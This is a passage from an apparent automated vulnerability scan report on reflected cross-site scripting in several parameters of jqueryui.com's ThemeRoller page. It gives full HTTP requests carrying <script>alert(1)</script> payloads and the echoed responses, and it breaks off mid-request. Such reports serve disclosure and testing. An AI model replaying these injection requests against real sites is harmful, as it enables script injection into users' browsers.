<input type="text" name="borderColorContent" id="borderColorContent" class="hex" value="8e846bdc3fb\\\"><script>alert(1)</script>251ce226b67" size="6" />
...[SNIP]...

1.150. http://jqueryui.com/themeroller/_rollyourown.php [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15983"><script>alert(1)</script>ee982da873b was submitted in the borderColorDefault parameter. This input was echoed as 15983\\\"><script>alert(1)</script>ee982da873b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d1940515983"><script>alert(1)</script>ee982da873b&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:31 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorDefault" id="borderColorDefault" class="hex" value="d1940515983\\\"><script>alert(1)</script>ee982da873b" size="6" />
...[SNIP]...

1.151. http://jqueryui.com/themeroller/_rollyourown.php [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790f4"><script>alert(1)</script>345bd3673c8 was submitted in the borderColorError parameter. This input was echoed as 790f4\\\"><script>alert(1)</script>345bd3673c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d790f4"><script>alert(1)</script>345bd3673c8&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorError" id="borderColorError" class="hex" value="ffb73d790f4\\\"><script>alert(1)</script>345bd3673c8" size="6" />
...[SNIP]...

1.152. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f74c"><script>alert(1)</script>53cf914cae5 was submitted in the borderColorHeader parameter. This input was echoed as 8f74c\\\"><script>alert(1)</script>53cf914cae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=4944378f74c"><script>alert(1)</script>53cf914cae5&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorHeader" id="borderColorHeader" class="hex" value="4944378f74c\\\"><script>alert(1)</script>53cf914cae5" size="6" />
...[SNIP]...

1.153. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bd56"><script>alert(1)</script>2b342c2c976 was submitted in the borderColorHighlight parameter. This input was echoed as 2bd56\\\"><script>alert(1)</script>2b342c2c976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb4202bd56"><script>alert(1)</script>2b342c2c976&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:43 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorHighlight" id="borderColorHighlight" class="hex" value="eeb4202bd56\\\"><script>alert(1)</script>2b342c2c976" size="6" />
...[SNIP]...

1.154. http://jqueryui.com/themeroller/_rollyourown.php [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd51"><script>alert(1)</script>9aa54ecab94 was submitted in the borderColorHover parameter. This input was echoed as 1fd51\\\"><script>alert(1)</script>9aa54ecab94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b131fd51"><script>alert(1)</script>9aa54ecab94&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorHover" id="borderColorHover" class="hex" value="a45b131fd51\\\"><script>alert(1)</script>9aa54ecab94" size="6" />
...[SNIP]...

1.155. http://jqueryui.com/themeroller/_rollyourown.php [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload affe9"><script>alert(1)</script>0f2a8359a6f was submitted in the cornerRadius parameter. This input was echoed as affe9\\\"><script>alert(1)</script>0f2a8359a6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8pxaffe9"><script>alert(1)</script>0f2a8359a6f&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
